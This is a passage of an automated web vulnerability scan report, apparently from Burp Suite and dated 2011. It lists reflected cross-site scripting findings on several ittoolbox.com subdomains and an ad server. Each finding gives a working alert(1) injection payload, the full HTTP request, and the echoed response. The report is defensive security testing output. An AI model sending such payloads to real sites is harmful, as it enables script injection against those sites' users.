ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.93. http://it.toolbox.com/people/dentrekin/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /people/dentrekin/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f043b'-alert(1)-'d674dcd1e76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /peoplef043b'-alert(1)-'d674dcd1e76/dentrekin/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 114986
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   People Sear
...[SNIP]...
sender != ctaBtnClicked) {
ctaBtnClicked = sender;
ctaDtClicked = new Date();
var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fPeopleSearch.aspx%3ff043b'-alert(1)-'d674dcd1e76%2fdentrekin%2f';
ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

document.getElementById('ctaimage').src = ckUr
...[SNIP]...

3.94. http://it.toolbox.com/people/dentrekin/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /people/dentrekin/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abb6e'-alert(1)-'20fe7c87edd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /people/dentrekin/?abb6e'-alert(1)-'20fe7c87edd=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 58420
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:48:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Demian Entr
...[SNIP]...
ed) {
ctaBtnClicked = sender;
ctaDtClicked = new Date();
var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fProfile.aspx%3fdisplayname%3ddentrekin%26abb6e'-alert(1)-'20fe7c87edd%3d1';
ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;

document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.95. http://java.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14c3c'-alert(1)-'dbbea786b9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?14c3c'-alert(1)-'dbbea786b9c=1 HTTP/1.1
Host: java.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59272
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=puv12c55hmsicw45dskys2un; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Java Commun
...[SNIP]...
nder != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fjava.ittoolbox.com%2fDefault.aspx%3f14c3c'-alert(1)-'dbbea786b9c%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.96. http://java.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23ef5"style%3d"x%3aexpression(alert(1))"fb0ed0c9733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23ef5"style="x:expression(alert(1))"fb0ed0c9733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?23ef5"style%3d"x%3aexpression(alert(1))"fb0ed0c9733=1 HTTP/1.1
Host: java.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59387
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s3wuxj45cit3vrfhkfjgtc2h; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Java Commun
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://java.ittoolbox.com/Default.aspx?23ef5"style="x:expression(alert(1))"fb0ed0c9733=1" />
...[SNIP]...

3.97. http://jlinks.industrybrains.com/jsct [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 97096<script>alert(1)</script>431b4ab0e87 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=940&ct=TOOLBOX_ROS97096<script>alert(1)</script>431b4ab0e87&num=5&layt=560x350v1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 26 Jan 2011 14:54:39 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 26 Jan 2011 14:54:39 GMT
Content-Type: application/x-javascript
Content-Length: 82

// Error: Unknown old section TOOLBOX_ROS97096<script>alert(1)</script>431b4ab0e87

3.98. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c24a9<script>alert(1)</script>bc533aa9af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp&c24a9<script>alert(1)</script>bc533aa9af=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 26 Jan 2011 14:54:45 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 26 Jan 2011 14:54:45 GMT
Content-Type: application/x-javascript
Content-Length: 68

// Error: Unknown parameter c24a9<script>alert(1)</script>bc533aa9af

3.99. http://knowledgemanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://knowledgemanagement.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24513"style%3d"x%3aexpression(alert(1))"6e9c15464a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24513"style="x:expression(alert(1))"6e9c15464a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?24513"style%3d"x%3aexpression(alert(1))"6e9c15464a3=1 HTTP/1.1
Host: knowledgemanagement.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71503
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xru5eafarzxxbh45vosz4u45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Knowledge M
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://knowledgemanagement.ittoolbox.com/Default.aspx?24513"style="x:expression(alert(1))"6e9c15464a3=1" />
...[SNIP]...

3.100. http://knowledgemanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://knowledgemanagement.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b1ec'-alert(1)-'613ef07e3c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?8b1ec'-alert(1)-'613ef07e3c0=1 HTTP/1.1
Host: knowledgemanagement.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71379
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pognpffpdtxcyyyvqhl1t4mr; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Knowledge M
...[SNIP]...
sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fknowledgemanagement.ittoolbox.com%2fDefault.aspx%3f8b1ec'-alert(1)-'613ef07e3c0%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.101. http://linux.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://linux.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5b1a'-alert(1)-'1ab6b4baf8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b5b1a'-alert(1)-'1ab6b4baf8e=1 HTTP/1.1
Host: linux.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72738
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=czqz3pfmadoitl55tflz5z45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Linux Commu
...[SNIP]...
der != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2flinux.ittoolbox.com%2fDefault.aspx%3fb5b1a'-alert(1)-'1ab6b4baf8e%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.102. http://linux.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://linux.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caa37"style%3d"x%3aexpression(alert(1))"6417fbb4293 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as caa37"style="x:expression(alert(1))"6417fbb4293 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?caa37"style%3d"x%3aexpression(alert(1))"6417fbb4293=1 HTTP/1.1
Host: linux.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72853
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=datgxxzqmexdo5qyjrao4gur; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Linux Commu
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://linux.ittoolbox.com/Default.aspx?caa37"style="x:expression(alert(1))"6417fbb4293=1" />
...[SNIP]...

3.103. http://networking.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://networking.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fef2c'-alert(1)-'f02e1021037 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fef2c'-alert(1)-'f02e1021037=1 HTTP/1.1
Host: networking.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 91891
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=a3uzlqvxnlhivdrz04yt0mmb; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Networking
...[SNIP]...
= null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fnetworking.ittoolbox.com%2fDefault.aspx%3ffef2c'-alert(1)-'f02e1021037%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.104. http://networking.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://networking.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd60"style%3d"x%3aexpression(alert(1))"71a53d9ebfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfd60"style="x:expression(alert(1))"71a53d9ebfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?cfd60"style%3d"x%3aexpression(alert(1))"71a53d9ebfe=1 HTTP/1.1
Host: networking.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 92006
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sxo2pe2p42mght553estfm45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Networking
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://networking.ittoolbox.com/Default.aspx?cfd60"style="x:expression(alert(1))"71a53d9ebfe=1" />
...[SNIP]...

3.105. http://oracle.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracle.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89c2f"style%3d"x%3aexpression(alert(1))"e4fee16d211 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89c2f"style="x:expression(alert(1))"e4fee16d211 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?89c2f"style%3d"x%3aexpression(alert(1))"e4fee16d211=1 HTTP/1.1
Host: oracle.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78373
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lau5lk55ph141tnfnn3hg4ra; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Oracle Comm
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://oracle.ittoolbox.com/Default.aspx?89c2f"style="x:expression(alert(1))"e4fee16d211=1" />
...[SNIP]...

3.106. http://oracle.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracle.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b4e1'-alert(1)-'3a93052e948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2b4e1'-alert(1)-'3a93052e948=1 HTTP/1.1
Host: oracle.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78256
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0dsxwmvpz4gckl553jtpamv2; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Oracle Comm
...[SNIP]...
er != null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2foracle.ittoolbox.com%2fDefault.aspx%3f2b4e1'-alert(1)-'3a93052e948%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.107. http://peoplesoft.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesoft.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35918"style%3d"x%3aexpression(alert(1))"3060ac84ade was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35918"style="x:expression(alert(1))"3060ac84ade in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?35918"style%3d"x%3aexpression(alert(1))"3060ac84ade=1 HTTP/1.1
Host: peoplesoft.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71238
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=i3igbt55zmfzngqpx3zc25jr; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   PeopleSoft
...[SNIP]...
<input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://peoplesoft.ittoolbox.com/Default.aspx?35918"style="x:expression(alert(1))"3060ac84ade=1" />
...[SNIP]...

3.108. http://peoplesoft.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesoft.ittoolbox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61edb'-alert(1)-'896663fa1e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?61edb'-alert(1)-'896663fa1e4=1 HTTP/1.1
Host: peoplesoft.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71129
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=iym3pizr0gbuoc45o0n1tdbj; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   PeopleSoft
...[SNIP]...
= null && sender != ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fpeoplesoft.ittoolbox.com%2fDefault.aspx%3f61edb'-alert(1)-'896663fa1e4%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.109. http://projectmanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

